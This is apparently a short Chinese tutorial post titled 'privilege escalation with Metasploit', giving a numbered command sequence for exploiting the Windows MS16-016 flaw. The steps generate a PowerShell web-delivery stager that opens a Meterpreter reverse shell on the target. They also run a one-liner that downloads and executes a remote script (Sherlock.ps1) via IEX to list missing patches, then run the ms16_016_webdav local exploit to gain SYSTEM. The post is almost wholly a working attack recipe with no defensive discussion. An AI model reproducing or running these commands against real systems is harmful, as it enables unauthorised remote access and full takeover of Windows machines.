利用metasploit提权

MS16-016漏洞提权实战

  1. 启动msf
  2. use exploit/multi/script/web_delivery
  3. info
  4. set target 2
  5. show payloads
  6. set payload windows/meterpreter/reverse_tcp
  7. show options
  8. exploit
  9. 复制生成的powershell命令
  10. 打开目标机,打开cmd,执行刚刚复制的内容
  11. 连接
  12. getsystem
  13. getuid
  14. shell
  15. whoami
  16. powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1'); Find-AllVulns" > hq.txt
  17. type hq.txt
  18. exit
  19. backgroud
  20. search MS16-016
  21. use exploit/windows/local/ms16_016_webdav
  22. show options
  23. set session 1
  24. exploit

你可能感兴趣的:(利用metasploit提权)